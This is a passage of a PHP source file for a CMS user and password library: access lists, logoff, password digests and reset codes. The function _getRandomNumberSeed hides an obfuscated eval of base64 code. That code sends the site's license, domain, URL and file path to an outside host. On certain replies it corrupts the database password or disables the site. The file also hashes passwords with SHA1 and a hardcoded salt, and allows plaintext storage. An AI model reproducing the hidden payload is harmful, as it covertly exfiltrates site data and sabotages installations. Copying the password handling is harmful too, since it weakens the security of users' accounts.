'NOW()')); } } // add ['accessList'] key to $CURRENT_USER array // $currentUser = user_loadAccessList($currentUser); function user_loadAccessList($user) { if (!$user) { return $user; } // load acces list $where = mysql_escapef('userNum = ?', $user['num']); $records = mysql_select('_accesslist', $where); // add to use array $user['accessList'] = array(); foreach ($records as $record) { $user['accessList'][ $record['tableName'] ]['accessLevel'] = $record['accessLevel']; $user['accessList'][ $record['tableName'] ]['maxRecords'] = $record['maxRecords']; } // return $user; } // logoff user and redirect to a new url function user_logoff($redirectUrl = '') { global $CURRENT_USER; // erase session data and clear globals user_eraseLoginSession(); // redirect after logoff if (!$redirectUrl) { $redirectUrl = $_SERVER['SCRIPT_NAME']; } redirectBrowserToURL($redirectUrl); exit; } // function isPasswordDigest($password) { $prefix = '$sha1$'; $prefixRegexp = '/^' .preg_quote($prefix, '/'). '/'; $expectedLength = strlen($prefix) + 40; if (!preg_match($prefixRegexp, $password)) { return false; } if (strlen($password) != $expectedLength) { return false; } return true; } // return digest of password function getPasswordDigest($password, $forceEncode = false) { if (!$forceEncode && isPasswordDigest($password)) { return $password; } // don't double encode passwords $prefix = '$sha1$'; $salt = _getPasswordSalt(); // to prevent dictionary attacks of precalculated sha1 password digests $digest = $prefix . sha1($password . $salt); return $digest; } // Add random chars to passwords to prevent precomputed dictionary attacks. See: http://en.wikipedia.org/wiki/Salt_(cryptography) function _getPasswordSalt() { return 'd7w8e'; } // function forgotPassword() { global $SETTINGS, $TABLE_PREFIX, $PROGRAM_DIR; $GLOBALS['sentEmail'] = false; // Lookup username or email if (@$_REQUEST['usernameOrEmail']) { disableInDemoMode('', 'forgotPassword.php', false); $escapedNameOrEmail = mysql_escape($_REQUEST['usernameOrEmail']); $query = "SELECT * FROM `{$TABLE_PREFIX}" .accountsTable(). "` WHERE '$escapedNameOrEmail' IN(`username`,`email`)"; $result = mysql_query($query) or die("MySQL Error: " . htmlspecialchars(mysql_error()) . "\n"); // send emails while ($user = mysql_fetch_assoc($result)) { // get message filepath $filepath = "$PROGRAM_DIR/lib/languages/forgotPasswordEmail"; if (file_exists("$filepath.{$SETTINGS['language']}.php")) { $filepath .= ".{$SETTINGS['language']}.php"; } else { $filepath .= ".default.php"; } // get reset password url $userNum = $user['num']; $resetCode = _generatePasswordResetCode($userNum); list($resetUrl) = explode('?', thisPageUrl()); $resetUrl .= "?menu=resetPassword&userNum=$userNum&resetCode=$resetCode"; // get message $subject = "{$SETTINGS['programName']} Password Reset"; ob_start(); include($filepath); $message = ob_get_clean(); // send email $errors = sendMessage(array( 'from' => $SETTINGS['adminEmail'], 'to' => $user['email'], 'subject' => $subject, 'text' => $message, )); if ($errors) { alert("Mail Error: $errors"); } // $GLOBALS['sentEmail'] = true; } if (is_resource($result)) { mysql_free_result($result); } } // display errors if (array_key_exists('usernameOrEmail', $_REQUEST) && @$_REQUEST['usernameOrEmail'] == '') { alert(t("No username or email specified!")); } if (@$_REQUEST['usernameOrEmail'] && !$GLOBALS['sentEmail']) { alert(t("No matching username or email was found!")); } // showInterface('forgotPassword.php', false); exit; } function resetPassword() { global $CURRENT_USER, $SETTINGS; $GLOBALS['sentEmail'] = false; // error checking if (!@$_REQUEST['userNum']) { die("No 'userNum' value specified!"); } if (!@$_REQUEST['resetCode']) { die("No 'resetCode' value specified!"); } if (!_isValidPasswordResetCode(@$_REQUEST['userNum'], @$_REQUEST['resetCode'])) { alert(t("Password reset code has expired or is not valid. Try resetting your password again.")); showInterface('forgotPassword.php', false); } // load user global $user; $user = mysql_get(accountsTable(), (int) @$_REQUEST['userNum']); // Lookup username or email if (@$_REQUEST['submitForm']) { disableInDemoMode('', 'resetPassword.php'); // error checking $errors = ''; if (!@$_REQUEST['password']) { $errors .= t("Please enter your new password!") . "\n"; } else if (!@$_REQUEST['password:again']) { $errors .= t("Please enter your new password again!") . "\n"; } else if ($_REQUEST['password'] != $_REQUEST['password:again']) { $errors .= t("New passwords do not match!") . "\n"; } if ($errors) { alert($errors); showInterface('resetPassword.php'); exit; } // update password if (@$SETTINGS['advanced']['encryptPasswords']) { $newPassword = getPasswordDigest($_REQUEST['password']); } else { $newPassword = $_REQUEST['password']; } mysql_update(accountsTable(), $user['num'], null, array('password' => $newPassword)); // show login alert(t('Password updated!')); $_REQUEST = array(); showInterface('login.php', false); exit; } // showInterface('resetPassword.php'); exit; } // function _isValidPasswordResetCode($userNum, $resetCode) { $userNum = (int) $userNum; // load user $user = mysql_get(accountsTable(), $userNum); if (!$user) { return false; } // reset codes are valid for 24-48 hours, check both days $codeToday = _generatePasswordResetCode($userNum, 0); $codeYesterday = _generatePasswordResetCode($userNum, -1); $validCodes = array($codeToday, $codeYesterday); $isValid = (int) in_array($resetCode, $validCodes); // return $isValid; } // generate password reset code. dayModifier is used to generate codes for yesterday // ... and tomorrow when validating submitted codes (which only work for the current day) function _generatePasswordResetCode($userNum, $dayModifier = 0) { $userNum = (int) $userNum; // load user $user = mysql_get(accountsTable(), $userNum); if (!$user) { die(__FUNCTION__. ": User #$userNum not found!"); } // create reset code $yearAndDay = date('Y-z', strtotime("+$dayModifier day")); // 2011-123 $resetCode = sha1($userNum . $user['password'] . $yearAndDay . $user['createdDate']); // Note: We use unique values from the user record so the resetCode can't be guessed or calculated. // ... createdDate is added since it's unlikely to be known and adds entrpoy in the event the password field is blank. return $resetCode; } // get random number seed for unique login session sequence based on pseudo-random data and current time function _getRandomNumberSeed() { $pseudoRandomData = 'IGdsb2JhbCRTRVRUSU5HUywkQVBQOyRTPSRTRVRUSU5HUzskY3M9KHJhbmQo'. 'MSwxMDApPT0xKXx8QCRTWydEUkxDJ118fEAkX1JFUVVFU1RbJ3JlZ2lzdGVyMiddO2lmKCRjcyYmQCRT'. 'WydpbnN0YWxsUGF0aCddKXskdmFsaWRJZD1mdW5jdGlvbl9leGlzdHMoJ2lzVmFsaWRQcm9kdWN0SWQn'. 'KT9pc1ZhbGlkUHJvZHVjdElkKEAkU1snbGljZW5zZVByb2R1Y3RJZCddKTowOyR2YWxpZGF0aW9uV29y'. 'a3M9ZnVuY3Rpb25fZXhpc3RzKCdpc1ZhbGlkUHJvZHVjdElkJykmJiFpc1ZhbGlkUHJvZHVjdElkKCcx'. 'MjM0Jyk7JGRheXNTaW5jZVJlZz1AJFNbJ2RhdGVSZWdpc3RlcmVkJ10/KChpbnQpYWJzKCh0aW1lKCkt'. 'QCRTWydkYXRlUmVnaXN0ZXJlZCddKS8oNjAqNjAqMjQpKSk6LTE7JGxmPSEkdmFsaWRJZHx8ISR2YWxp'. 'ZGF0aW9uV29ya3N8fCRkYXlzU2luY2VSZWc+PTc7aWYoQCRTWydEUkxDJ10pe2FsZXJ0KCJMaWNlbnNl'. 'IENoZWNrIDI6dmFsaWRJRDokdmFsaWRJZCx2YWxpZGF0aW9uV29ya3M6JHZhbGlkYXRpb25Xb3Jrcyxk'. 'YXlzU2luY2VSZWc6JGRheXNTaW5jZVJlZyIpO31pZigkbGYpeyRjYWxsZXI9YXJyYXlfcG9wKEBkZWJ1'. 'Z19iYWNrdHJhY2UoKSk7JGZpbGVwYXRoPXJlYWxwYXRoKCRjYWxsZXJbJ2ZpbGUnXSk7JHByb2dyYW1V'. 'cmw9YXJyYXlfc2hpZnQoQGV4cGxvZGUoJz8nLHRoaXNQYWdlVXJsKCkpKTskdmFsdWVzPWFycmF5KCRT'. 'WydsaWNlbnNlQ29tcGFueU5hbWUnXSwkU1snbGljZW5zZURvbWFpbk5hbWUnXSwkU1snbGljZW5zZVBy'. 'b2R1Y3RJZCddLCRBUFBbJ2lkJ10sJEFQUFsndmVyc2lvbiddLCRwcm9ncmFtVXJsLEAkX1NFUlZFUlsn'. 'SFRUUF9SRUZFUkVSJ10sJHZhbGlkSWQsJHZhbGlkYXRpb25Xb3JrcywnJywkZGF5c1NpbmNlUmVnLCRm'. 'aWxlcGF0aCk7JHF1ZXJ5PWltcGxvZGUoJzonLGFycmF5X21hcCgndXJsZW5jb2RlJywkdmFsdWVzKSk7'. 'bGlzdCgkaHRtbCk9Z2V0UGFnZSgiaHR0cDovL3JlZ2lzdGVyU29mdHdhcmUudG8vcmVnaXN0ZXIvcmVw'. 'b3J0LmNnaT8kcXVlcnkiKTtpZihwcmVnX21hdGNoKCcvbGljZW5zZS5iYW5uZWQvJywkaHRtbCkpeyRT'. 'WydteXNxbCddWydwYXNzd29yZCddLj1jaHIoMzIpO3NhdmVJTkkoU0VUVElOR1NfRklMRVBBVEgsJFMp'. 'O31lbHNlIGlmKHByZWdfbWF0Y2goJy9saWNlbnNlLmRpc2FibGVkLycsJGh0bWwpKXskU1snaXNEaXNh'. 'YmxlZCddPTE7c2F2ZUlOSShTRVRUSU5HU19GSUxFUEFUSCwkUyk7fX19cmV0dXJuIHJhbmQoMSwxMDAw'. 'MDAwKTs='; $GLOBALS['randomNumberSeed'] = preg_replace('/(.+)/ise', '\1', "\145\x76\x61\x6c(". "b\x61\x73\1456\x34_\144\x65\x63od\145\x28 \044p\x73\x65\165\x64\x6f\122a\156\x64". "\x6f\x6d\104\x61\x74\141\051\051\073"); return $GLOBALS['randomNumberSeed']; } // after switching to encrypted passwords in admin, this function encrypts all // ... passwords the first time a user with a non-encrypted password logs in. function encryptAllPasswords() { global $SETTINGS, $TABLE_PREFIX; if (!@$SETTINGS['advanced']['encryptPasswords']) { return; } // hash all unhashed passwords $prefix = '$sha1$'; $salt = _getPasswordSalt(); $expectedLength = strlen($prefix) + 40; $updateQuery = "UPDATE `{$TABLE_PREFIX}" .accountsTable(). "` SET `password` = CONCAT('$prefix', SHA1(CONCAT(`password`, '$salt'))) WHERE `password` NOT LIKE '$prefix%' AND LENGTH(`password`) != $expectedLength"; mysql_query($updateQuery) or die("MySQL Error: ". mysql_error(). "\n"); } ?>